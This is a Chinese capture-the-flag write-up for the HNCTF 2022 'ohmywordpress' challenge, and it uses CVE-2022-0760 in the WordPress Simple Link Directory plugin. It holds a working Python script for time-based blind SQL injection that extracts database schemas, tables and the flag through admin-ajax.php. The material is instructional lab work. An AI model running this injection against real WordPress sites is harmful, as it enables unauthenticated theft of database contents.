CVE-2022-0760
NSS [HNCTF 2022 WEEK2]ohmywordpress
【CVE-2022-0760】
题目描述:flag在数据库里面。
开题:
data:image/s3,"s3://crabby-images/c7527/c75274b2fc33991a1d14779aedfb4657c9414a94" alt=""
顺着按钮一直点下去会发现出现一个按钮叫安装WordPress
data:image/s3,"s3://crabby-images/5b95f/5b95fc3b90b06aa015dc0e7e21f2c502fb9bc5ae" alt=""
安装完之后的界面,有一个搜索框。
data:image/s3,"s3://crabby-images/95356/953561b7d4e9fba7e5b18a269dbdb67c6eac9fa6" alt=""
F12看看network。
又出现了这个WordPress
,从源码中看出版本是6.0.2
。
data:image/s3,"s3://crabby-images/b1860/b18603a8ebdba8e3ccbd2cdc314811eb1c8aa81f" alt=""
data:image/s3,"s3://crabby-images/c6cdb/c6cdba0db26ea13574450d16f402ebd1d3adc464" alt=""
网上一番搜索,找到一个cve,CVE-2022-0760
。当WordPress
的插件Simple Link Directory
版本 < 7.7.2时候存在时间盲注。
查看源码,这里确实运用的这个插件,但是看不到版本。
data:image/s3,"s3://crabby-images/9a1b1/9a1b17f90358d3f65a41f32281408b42cc2b2e3a" alt=""
估计就是这个CVE,那就直接上盲注脚本。
python
import requests
import time
url = "http://node5.anna.nssctf.cn:28982/wp-admin/admin-ajax.php"
result = ""
for i in range(1, 100):
length = len(result)
for o in range(32, 128):
data = {
"action": "qcopd_upvote_action",
# "post_id": f"(SELECT 3 FROM (select if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))={o},sleep(3),0))enz)",
# "post_id": f"(SELECT 3 FROM (select if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=substr((select group_concat(schema_name) from information_schema.schemata),26,11)),{i},1))={o},sleep(3),0))enz)",
"post_id": f"(SELECT 3 FROM (select if(ascii(substr((select group_concat(a) from (select 1 as a union select * from ctftraining.flag)b),{i},1))={o},sleep(3),0))enz)",
}
time1 = time.time()
res = requests.post(url, data=data)
time2 = time.time()
# print(time2 - time1)
# exit()
if time2 - time1 > 3:
result += chr(o)
print(result)
break
if len(result) == length:
break
data:image/s3,"s3://crabby-images/72177/72177e00a50dd29003a280643c519910ab458350" alt=""
为什么这样写脚本,漏洞利用在下面文章里面能找到。
data:image/s3,"s3://crabby-images/5884c/5884c56ed0ae23e11cb4702750e196b2512032c3" alt=""
参考文章:
[Simple Link Directory < 7.7.2 - Unauthenticated SQL injection WordPress Security Vulnerability (wpscan.com)](